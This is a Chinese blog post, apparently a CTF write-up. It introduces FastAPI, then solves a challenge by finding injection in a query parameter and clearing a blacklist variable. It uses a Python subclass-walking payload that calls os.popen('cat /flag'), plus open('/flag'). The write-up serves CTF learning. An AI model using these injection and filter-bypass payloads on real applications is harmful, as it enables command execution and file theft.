原谅5_fastapi2(fastapi)

文章目录

了解fastapi

fastapi的官方文档:https://fastapi.tiangolo.com/zh/

根据官方文档所说,fastapi是一个web框架,感觉和flask差不多

在这里插入图片描述

然后下载fastapi试试:

pip install fastapi
pip install uvicorn

安装好之后把文档里的示例代码运行一下

main.py

在这里插入图片描述
运行:

uvicorn main:app --reload

在这里插入图片描述

在这里插入图片描述
看到了和文档差不多的结果,然后访问http://127.0.0.1:8000/,可以发现环境已经搭建好了
在这里插入图片描述

测试一下路由/items/{item_id},访问http://127.0.0.1:8000/items/5?q=somequery

@app.get("/items/{item_id}")
def read_item(item_id: int, q: str = None):
    return {"item_id": item_id, "q": q}

在这里插入图片描述

item_id: int, q: str = None的作用是定义数据类型为int和str,并且给q赋初值None,不传q果然为空
在这里插入图片描述
如果不赋初值的话则必须传q,否则会报错。

fastapi还有个交互式API,地址为/docs和/redoc,可以通过它来选择要调试的api,并传递参数给api实时查看结果,也就是说有了这个界面我们就知道参数有哪些,否则光一个api界面我们也不知道参数,因此这个功能只能用于调试。
在这里插入图片描述

题解

进入题目是一个fastapi,然后访问/docs或/redoc访问交互式界面
在这里插入图片描述

有三个路由,根据题目意思应该选择中间那个
在这里插入图片描述

通过这个界面我们知道它需要传递一个参数q进去
在这里插入图片描述

因为是基于python的,所以试试ssti,测试发现存在ssti
在这里插入图片描述

然后注入,怎么注入都不行,后面的操作就有点看不懂了,看了题解才知道有过滤,先查看当前的全局变量

list(calc.__globals__)

在这里插入图片描述

查看其中的 youdontknow

youdontknow

在这里插入图片描述

好家伙,过滤了class,然后要用clear()把这个变量清空

youdontknow.clear()

在这里插入图片描述

然后就是正常的ssti了

q=str([].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__imp'+'ort__']("os").__dict__['pop'+'en']("cat /flag").read())

在这里插入图片描述

还可以通过open函数直接读取

open("/flag").read()

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
以下是一个示例的HTML代码,可以用烟花特效显示“姐姐我错啦,原谅我好不好”: ```html <!DOCTYPE html> <html> <head> <title>烟花效果</title> <style type="text/css"> body { background-color: black; } .firework { position: absolute; border-radius: 50%; background-color: #fff; animation: explode 1s ease-out forwards; } @keyframes explode { 0% { transform: scale(0); } 100% { transform: scale(15); opacity: 0; } } .message { position: absolute; font-size: 40px; color: white; left: 50%; top: 50%; transform: translate(-50%, -50%); animation: fade 3s ease-out forwards; } @keyframes fade { 0% { opacity: 0; } 100% { opacity: 1; } } </style> </head> <body> <div class="message">姐姐我错啦,原谅我好不好</div> <script type="text/javascript"> // 创建烟花 function createFirework() { var firework = document.createElement('div'); firework.className = 'firework'; firework.style.left = Math.random() * 100 + '%'; firework.style.top = Math.random() * 100 + '%'; document.body.appendChild(firework); setTimeout(function() { firework.parentNode.removeChild(firework); }, 1000); } // 定时创建烟花 setInterval(createFirework, 500); </script> </body> </html> ``` 这段代码会在页面中央显示一个白色的文字“姐姐我错啦,原谅我好不好”,并且会随机创建白色的烟花特效。可以在样式中调整文字的颜色、大小、位置等属性,也可以在JavaScript中调整烟花的创建间隔、持续时间等参数。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值